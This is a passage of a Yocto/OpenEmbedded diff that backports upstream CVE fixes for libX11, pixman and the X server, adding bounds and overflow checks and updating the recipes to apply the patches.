diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
new file mode 100644
index 0000000000..31a99eb4ac
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-1.patch
@@ -0,0 +1,42 @@
+From 204c3393c4c90a29ed6bef64e43849536e863a86 Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:54:30 -0700
+Subject: [PATCH libX11 2/5] CVE-2023-43786: stack exhaustion from infinite
+ recursion in PutSubImage()
+
+When splitting a single line of pixels into chunks to send to the
+X server, be sure to take into account the number of bits per pixel,
+so we don't just loop forever trying to send more pixels than fit in
+the given request size and not breaking them down into a small enough
+chunk to fix.
+
+Fixes: "almost complete rewrite" (Dec. 12, 1987) from X11R2
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0002-CVE-2023-43786-stack-exhaustion-from-infinite-recurs.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/204c3393c4c90a29ed6bef64e43849536e863a86]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index 857ee916..a6db7b42 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -914,8 +914,9 @@ PutSubImage (
+ req_width, req_height - SubImageHeight,
+ dest_bits_per_pixel, dest_scanline_pad);
+ } else {
+- int SubImageWidth = (((Available << 3) / dest_scanline_pad)
+- * dest_scanline_pad) - left_pad;
++ int SubImageWidth = ((((Available << 3) / dest_scanline_pad)
++ * dest_scanline_pad) - left_pad)
++ / dest_bits_per_pixel;
+
+ PutSubImage(dpy, d, gc, image, req_xoffset, req_yoffset, x, y,
+ (unsigned int) SubImageWidth, 1,
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
new file mode 100644
index 0000000000..4800bedf41
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43786-2.patch
@@ -0,0 +1,46 @@
+From 73a37d5f2fcadd6540159b432a70d80f442ddf4a Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 15:55:04 -0700
+Subject: [PATCH libX11 3/5] XPutImage: clip images to maximum height & width
+ allowed by protocol
+
+The PutImage request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), same as the maximum dimensions of an X11
+Drawable, which the image is being copied to.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0003-XPutImage-clip-images-to-maximum-height-width-allowe.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/73a37d5f2fcadd6540159b432a70d80f442ddf4a]
+CVE: CVE-2023-43786
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/PutImage.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/src/PutImage.c b/src/PutImage.c
+index a6db7b42..ba411e36 100644
+--- a/src/PutImage.c
++++ b/src/PutImage.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include "Xlibint.h"
+ #include "Xutil.h"
+ #include <stdio.h>
++#include <limits.h>
+ #include "Cr.h"
+ #include "ImUtil.h"
+ #include "reallocarray.h"
+@@ -962,6 +963,10 @@ XPutImage (
+ height = image->height - req_yoffset;
+ if ((width <= 0) || (height <= 0))
+ return 0;
++ if (width > USHRT_MAX)
++ width = USHRT_MAX;
++ if (height > USHRT_MAX)
++ height = USHRT_MAX;
+
+ if ((image->bits_per_pixel == 1) || (image->format != ZPixmap)) {
+ dest_bits_per_pixel = 1;
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
new file mode 100644
index 0000000000..d35d96c4dc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-1.patch
@@ -0,0 +1,52 @@
+From b4031fc023816aca07fbd592ed97010b9b48784b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Thu, 7 Sep 2023 16:12:27 -0700
+Subject: [PATCH libX11 4/5] XCreatePixmap: trigger BadValue error for
+ out-of-range dimensions
+
+The CreatePixmap request specifies height & width of the image as CARD16
+(unsigned 16-bit integer), so if either is larger than that, set it to 0
+so the X server returns a BadValue error as the protocol requires.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0004-XCreatePixmap-trigger-BadValue-error-for-out-of-rang.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/b4031fc023816aca07fbd592ed97010b9b48784b]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/CrPixmap.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/src/CrPixmap.c b/src/CrPixmap.c
+index cdf31207..3cb2ca6d 100644
+--- a/src/CrPixmap.c
++++ b/src/CrPixmap.c
+@@ -28,6 +28,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <config.h>
+ #endif
+ #include "Xlibint.h"
++#include <limits.h>
+
+ #ifdef USE_DYNAMIC_XCURSOR
+ void
+@@ -47,6 +48,16 @@ Pixmap XCreatePixmap (
+ Pixmap pid;
+ register xCreatePixmapReq *req;
+
++ /*
++ * Force a BadValue X Error if the requested dimensions are larger
++ * than the X11 protocol has room for, since that's how callers expect
++ * to get notified of errors.
++ */
++ if (width > USHRT_MAX)
++ width = 0;
++ if (height > USHRT_MAX)
++ height = 0;
++
+ LockDisplay(dpy);
+ GetReq(CreatePixmap, req);
+ req->drawable = d;
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
new file mode 100644
index 0000000000..110bd445df
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/libx11/CVE-2023-43787-2.patch
@@ -0,0 +1,64 @@
+From 7916869d16bdd115ac5be30a67c3749907aea6a0 Mon Sep 17 00:00:00 2001
+From: Yair Mizrahi <yairm@jfrog.com>
+Date: Thu, 7 Sep 2023 16:15:32 -0700
+Subject: [PATCH libX11 5/5] CVE-2023-43787: Integer overflow in XCreateImage()
+ leading to a heap overflow
+
+When the format is `Pixmap` it calculates the size of the image data as:
+ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+There is no validation on the `width` of the image, and so this
+calculation exceeds the capacity of a 4-byte integer, causing an overflow.
+
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/libx11/tree/debian/patches/0005-CVE-2023-43787-Integer-overflow-in-XCreateImage-lead.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.freedesktop.org/xorg/lib/libx11/-/commit/7916869d16bdd115ac5be30a67c3749907aea6a0]
+CVE: CVE-2023-43787
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ImUtil.c | 20 +++++++++++++++-----
+ 1 file changed, 15 insertions(+), 5 deletions(-)
+
+diff --git a/src/ImUtil.c b/src/ImUtil.c
+index 36f08a03..fbfad33e 100644
+--- a/src/ImUtil.c
++++ b/src/ImUtil.c
+@@ -30,6 +30,7 @@ in this Software without prior written authorization from The Open Group.
+ #include <X11/Xlibint.h>
+ #include <X11/Xutil.h>
+ #include <stdio.h>
++#include <limits.h>
+ #include "ImUtil.h"
+
+ static int _XDestroyImage(XImage *);
+@@ -361,13 +362,22 @@ XImage *XCreateImage (
+ /*
+ * compute per line accelerator.
+ */
+- {
+- if (format == ZPixmap)
++ if (format == ZPixmap) {
++ if ((INT_MAX / bits_per_pixel) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
+- else
++ ROUNDUP((bits_per_pixel * width), image->bitmap_pad);
++ } else {
++ if ((INT_MAX - offset) < width) {
++ Xfree(image);
++ return NULL;
++ }
++
+ min_bytes_per_line =
+- ROUNDUP((width + offset), image->bitmap_pad);
++ ROUNDUP((width + offset), image->bitmap_pad);
+ }
+ if (image_bytes_per_line == 0) {
+ image->bytes_per_line = min_bytes_per_line;
+--
+2.39.3
+
diff --git a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
index ebd2640743..248889a1d4 100644
--- a/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
+++ b/meta/recipes-graphics/xorg-lib/libx11_1.6.9.bb
@@ -15,6 +15,15 @@ SRC_URI += "file://Fix-hanging-issue-in-_XReply.patch \
file://libx11-whitespace.patch \
file://CVE-2020-14344.patch \
file://CVE-2020-14363.patch \
+ file://CVE-2021-31535.patch \
+ file://CVE-2022-3554.patch \
+ file://CVE-2022-3555.patch \
+ file://CVE-2023-3138.patch \
+ file://CVE-2023-43785.patch \
+ file://CVE-2023-43786-1.patch \
+ file://CVE-2023-43786-2.patch \
+ file://CVE-2023-43787-1.patch \
+ file://CVE-2023-43787-2.patch \
"
SRC_URI[md5sum] = "55adbfb6d4370ecac5e70598c4e7eed2"
diff --git a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
index fda8e32d2c..4694f911be 100644
--- a/meta/recipes-graphics/xorg-lib/libxpm_3.5.13.bb
+++ b/meta/recipes-graphics/xorg-lib/libxpm_3.5.17.bb
@@ -11,17 +11,18 @@ an extension of the monochrome XBM bitmap specificied in the X \
protocol."
LICENSE = "MIT"
-LIC_FILES_CHKSUM = "file://COPYING;md5=51f4270b012ecd4ab1a164f5f4ed6cf7"
+LIC_FILES_CHKSUM = "file://COPYING;md5=903942ebc9d807dfb68540f40bae5aff"
DEPENDS += "libxext libsm libxt gettext-native"
PE = "1"
XORG_PN = "libXpm"
+XORG_EXT = "tar.xz"
+EXTRA_OECONF += "--disable-open-zfile"
PACKAGES =+ "sxpm cxpm"
FILES_cxpm = "${bindir}/cxpm"
FILES_sxpm = "${bindir}/sxpm"
-SRC_URI[md5sum] = "6f0ecf8d103d528cfc803aa475137afa"
-SRC_URI[sha256sum] = "9cd1da57588b6cb71450eff2273ef6b657537a9ac4d02d0014228845b935ac25"
+SRC_URI[sha256sum] = "64b31f81019e7d388c822b0b28af8d51c4622b83f1f0cb6fa3fc95e271226e43"
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
index cc45696530..38cab99bbe 100644
--- a/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
+++ b/meta/recipes-graphics/xorg-lib/libxshmfence_1.3.bb
@@ -6,7 +6,7 @@ using file descriptor passing."
require xorg-lib-common.inc
-LICENSE = "MIT-style"
+LICENSE = "HPND"
LIC_FILES_CHKSUM = "file://COPYING;md5=47e508ca280fde97906eacb77892c3ac"
DEPENDS += "virtual/libx11"
diff --git a/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
new file mode 100644
index 0000000000..d54ae16b33
--- /dev/null
+++ b/meta/recipes-graphics/xorg-lib/pixman/CVE-2022-44638.patch
@@ -0,0 +1,34 @@
+CVE: CVE-2022-44638
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+Signed-off-by:Bhabu Bindu <bhabu.bindu@kpit.com>
+
+From a1f88e842e0216a5b4df1ab023caebe33c101395 Mon Sep 17 00:00:00 2001
+From: Matt Turner <mattst88@gmail.com>
+Date: Wed, 2 Nov 2022 12:07:32 -0400
+Subject: [PATCH] Avoid integer overflow leading to out-of-bounds write
+
+Thanks to Maddie Stone and Google's Project Zero for discovering this
+issue, providing a proof-of-concept, and a great analysis.
+
+Closes: https://gitlab.freedesktop.org/pixman/pixman/-/issues/63
+---
+ pixman/pixman-trap.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/pixman/pixman-trap.c b/pixman/pixman-trap.c
+index 91766fd..7560405 100644
+--- a/pixman/pixman-trap.c
++++ b/pixman/pixman-trap.c
+@@ -74,7 +74,7 @@ pixman_sample_floor_y (pixman_fixed_t y,
+
+ if (f < Y_FRAC_FIRST (n))
+ {
+- if (pixman_fixed_to_int (i) == 0x8000)
++ if (pixman_fixed_to_int (i) == 0xffff8000)
+ {
+ f = 0; /* saturate */
+ }
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
index 22e19ba069..5873c19bab 100644
--- a/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
+++ b/meta/recipes-graphics/xorg-lib/pixman_0.38.4.bb
@@ -10,6 +10,7 @@ DEPENDS = "zlib"
SRC_URI = "https://www.cairographics.org/releases/${BP}.tar.gz \
file://0001-ARM-qemu-related-workarounds-in-cpu-features-detecti.patch \
file://0001-test-utils-Check-for-FE_INVALID-definition-before-us.patch \
+ file://CVE-2022-44638.patch \
"
SRC_URI[md5sum] = "267a7af290f93f643a1bc74490d9fdd1"
SRC_URI[sha256sum] = "da66d6fd6e40aee70f7bd02e4f8f76fc3f006ec879d346bae6a723025cfbdde7"
diff --git a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
index a566eaa45e..1e8525d874 100644
--- a/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
+++ b/meta/recipes-graphics/xorg-lib/xorg-lib-common.inc
@@ -6,8 +6,9 @@ LICENSE = "MIT-X"
DEPENDS = "util-macros"
XORG_PN = "${BPN}"
+XORG_EXT ?= "tar.bz2"
-SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.tar.bz2"
+SRC_URI = "${XORG_MIRROR}/individual/lib/${XORG_PN}-${PV}.${XORG_EXT}"
S = "${WORKDIR}/${XORG_PN}-${PV}"
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
index b4f0760176..ce57982a7d 100644
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
@@ -16,9 +16,17 @@ PE = "2"
INC_PR = "r8"
XORG_PN = "xorg-server"
-SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2"
-
-CVE_PRODUCT = "xorg-server"
+SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.gz"
+
+CVE_PRODUCT = "xorg-server x_server"
+# This is specific to Debian's xserver-wrapper.c
+CVE_CHECK_WHITELIST += "CVE-2011-4613"
+# As per upstream, exploiting this flaw is non-trivial and it requires exact
+# timing on the behalf of the attacker. Many graphical applications exit if their
+# connection to the X server is lost, so a typical desktop session is either
+# impossible or difficult to exploit. There is currently no upstream patch
+# available for this flaw.
+CVE_CHECK_WHITELIST += "CVE-2020-25697"
S = "${WORKDIR}/${XORG_PN}-${PV}"
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
deleted file mode 100644
index 4994a21d33..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c940cc8b6c0a2983c1ec974f1b3f019795dd4cff Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:49:04 +0200
-Subject: [PATCH] Fix XIChangeHierarchy() integer underflow
-
-CVE-2020-14346 / ZDI-CAN-11429
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/c940cc8b6c0a2983c1ec974f1b3f019795dd4cff]
-CVE: CVE-2020-14346
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Xi/xichangehierarchy.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
-index cbdd91258..504defe56 100644
---- a/Xi/xichangehierarchy.c
-+++ b/Xi/xichangehierarchy.c
-@@ -423,7 +423,7 @@ ProcXIChangeHierarchy(ClientPtr client)
- if (!stuff->num_changes)
- return rc;
-
-- len = ((size_t)stuff->length << 2) - sizeof(xXIChangeHierarchyReq);
-+ len = ((size_t)client->req_len << 2) - sizeof(xXIChangeHierarchyReq);
-
- any = (xXIAnyHierarchyChangeInfo *) &stuff[1];
- while (stuff->num_changes--) {
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
deleted file mode 100644
index cf3f5f9417..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aac28e162e5108510065ad4c323affd6deffd816 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Sat, 25 Jul 2020 19:33:50 +0200
-Subject: [PATCH] fix for ZDI-11426
-
-Avoid leaking un-initalized memory to clients by zeroing the
-whole pixmap on initial allocation.
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-Reviewed-by: Alan Coopersmith <alan.coopersmith@oracle.com>
-
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/aac28e162e5108510065ad4c323affd6deffd816]
-CVE: CVE-2020-14347
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- dix/pixmap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/dix/pixmap.c b/dix/pixmap.c
-index 1186d7dbbf..5a0146bbb6 100644
---- a/dix/pixmap.c
-+++ b/dix/pixmap.c
-@@ -116,7 +116,7 @@ AllocatePixmap(ScreenPtr pScreen, int pixDataSize)
- if (pScreen->totalPixmapSize > ((size_t) - 1) - pixDataSize)
- return NullPixmap;
-
-- pPixmap = malloc(pScreen->totalPixmapSize + pixDataSize);
-+ pPixmap = calloc(1, pScreen->totalPixmapSize + pixDataSize);
- if (!pPixmap)
- return NullPixmap;
-
---
-GitLab
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
deleted file mode 100644
index 710cc3873c..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 144849ea27230962227e62a943b399e2ab304787 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:52:29 +0200
-Subject: [PATCH] Fix XkbSelectEvents() integer underflow
-
-CVE-2020-14361 ZDI-CAN 11573
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/144849ea27230962227e62a943b399e2ab304787]
-CVE: CVE-2020-14361
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- xkb/xkbSwap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/xkb/xkbSwap.c b/xkb/xkbSwap.c
-index 1c1ed5ff4..50cabb90e 100644
---- a/xkb/xkbSwap.c
-+++ b/xkb/xkbSwap.c
-@@ -76,7 +76,7 @@ SProcXkbSelectEvents(ClientPtr client)
- register unsigned bit, ndx, maskLeft, dataLeft, size;
-
- from.c8 = (CARD8 *) &stuff[1];
-- dataLeft = (stuff->length * 4) - SIZEOF(xkbSelectEventsReq);
-+ dataLeft = (client->req_len * 4) - SIZEOF(xkbSelectEventsReq);
- maskLeft = (stuff->affectWhich & (~XkbMapNotifyMask));
- for (ndx = 0, bit = 1; (maskLeft != 0); ndx++, bit <<= 1) {
- if (((bit & maskLeft) == 0) || (ndx == XkbMapNotify))
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
deleted file mode 100644
index 2103e9c198..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 2902b78535ecc6821cc027351818b28a5c7fdbdc Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:55:01 +0200
-Subject: [PATCH] Fix XRecordRegisterClients() Integer underflow
-
-CVE-2020-14362 ZDI-CAN-11574
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/2902b78535ecc6821cc027351818b28a5c7fdbdc]
-CVE: CVE-2020-14362
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- record/record.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/record/record.c b/record/record.c
-index f2d38c877..be154525d 100644
---- a/record/record.c
-+++ b/record/record.c
-@@ -2500,7 +2500,7 @@ SProcRecordQueryVersion(ClientPtr client)
- } /* SProcRecordQueryVersion */
-
- static int _X_COLD
--SwapCreateRegister(xRecordRegisterClientsReq * stuff)
-+SwapCreateRegister(ClientPtr client, xRecordRegisterClientsReq * stuff)
- {
- int i;
- XID *pClientID;
-@@ -2510,13 +2510,13 @@ SwapCreateRegister(xRecordRegisterClientsReq * stuff)
- swapl(&stuff->nRanges);
- pClientID = (XID *) &stuff[1];
- if (stuff->nClients >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq))
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq))
- return BadLength;
- for (i = 0; i < stuff->nClients; i++, pClientID++) {
- swapl(pClientID);
- }
- if (stuff->nRanges >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq)
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq)
- - stuff->nClients)
- return BadLength;
- RecordSwapRanges((xRecordRange *) pClientID, stuff->nRanges);
-@@ -2531,7 +2531,7 @@ SProcRecordCreateContext(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordCreateContextReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordCreateContext(client);
- } /* SProcRecordCreateContext */
-@@ -2544,7 +2544,7 @@ SProcRecordRegisterClients(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordRegisterClientsReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordRegisterClients(client);
- } /* SProcRecordRegisterClients */
---
-2.17.1
-
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
new file mode 100644
index 0000000000..efec7b6b4e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
@@ -0,0 +1,40 @@
+From d2dcbdc67c96c84dff301505072b0b7b022f1a14 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:40:21 +0000
+Subject: [PATCH 1/3] xkb: proof GetCountedString against request length
+ attacks
+
+GetCountedString did a check for the whole string to be within the
+request buffer but not for the initial 2 bytes that contain the length
+field. A swapped client could send a malformed request to trigger a
+swaps() on those bytes, writing into random memory.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Ustream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]
+CVE: CVE-2022-3550
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index 68c59df..bf8aaa3 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5138,6 +5138,11 @@ _GetCountedString(char **wire_inout, ClientPtr client, char **str)
+ CARD16 len;
+
+ wire = *wire_inout;
++
++ if (client->req_len <
++ bytes_to_int32(wire + 2 - (char *) client->requestBuffer))
++ return BadValue;
++
+ len = *(CARD16 *) wire;
+ if (client->swapped) {
+ swaps(&len);
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
new file mode 100644
index 0000000000..a3b977aac9
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
@@ -0,0 +1,64 @@
+From d3787290f56165f5656ddd2123dbf676a32d0a68 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:44:00 +0000
+Subject: [PATCH 2/3] xkb: fix some possible memleaks in XkbGetKbdByName
+
+GetComponentByName returns an allocated string, so let's free that if we
+fail somewhere.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=18f91b950e22c2a342a4fbc55e9ddf7534a707d2]
+CVE: CVE-2022-3551
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 26 +++++++++++++++++++-------
+ 1 file changed, 19 insertions(+), 7 deletions(-)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index bf8aaa3..f79d306 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5908,19 +5908,31 @@ ProcXkbGetKbdByName(ClientPtr client)
+ xkb = dev->key->xkbInfo->desc;
+ status = Success;
+ str = (unsigned char *) &stuff[1];
+- if (GetComponentSpec(&str, TRUE, &status)) /* keymap, unsupported */
+- return BadMatch;
++ {
++ char *keymap = GetComponentSpec(&str, TRUE, &status); /* keymap, unsupported */
++ if (keymap) {
++ free(keymap);
++ return BadMatch;
++ }
++ }
+ names.keycodes = GetComponentSpec(&str, TRUE, &status);
+ names.types = GetComponentSpec(&str, TRUE, &status);
+ names.compat = GetComponentSpec(&str, TRUE, &status);
+ names.symbols = GetComponentSpec(&str, TRUE, &status);
+ names.geometry = GetComponentSpec(&str, TRUE, &status);
+- if (status != Success)
+- return status;
+- len = str - ((unsigned char *) stuff);
+- if ((XkbPaddedSize(len) / 4) != stuff->length)
+- return BadLength;
++ if (status == Success) {
++ len = str - ((unsigned char *) stuff);
++ if ((XkbPaddedSize(len) / 4) != stuff->length)
++ status = BadLength;
++ }
+
++ if (status != Success) {
++ free(names.keycodes);
++ free(names.types);
++ free(names.compat);
++ free(names.symbols);
++ free(names.geometry);
++ }
+ CHK_MASK_LEGAL(0x01, stuff->want, XkbGBN_AllComponentsMask);
+ CHK_MASK_LEGAL(0x02, stuff->need, XkbGBN_AllComponentsMask);
+
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
new file mode 100644
index 0000000000..94cea77edc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
@@ -0,0 +1,49 @@
+From 57ad2c03730d56f8432b6d66b29c0e5a9f9b1ec2 Mon Sep 17 00:00:00 2001
+From: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+Date: Sun, 4 Dec 2022 17:46:18 +0000
+Subject: [PATCH 3/3] xquartz: Fix a possible crash when editing the
+ Application menu due to mutaing immutable arrays
+
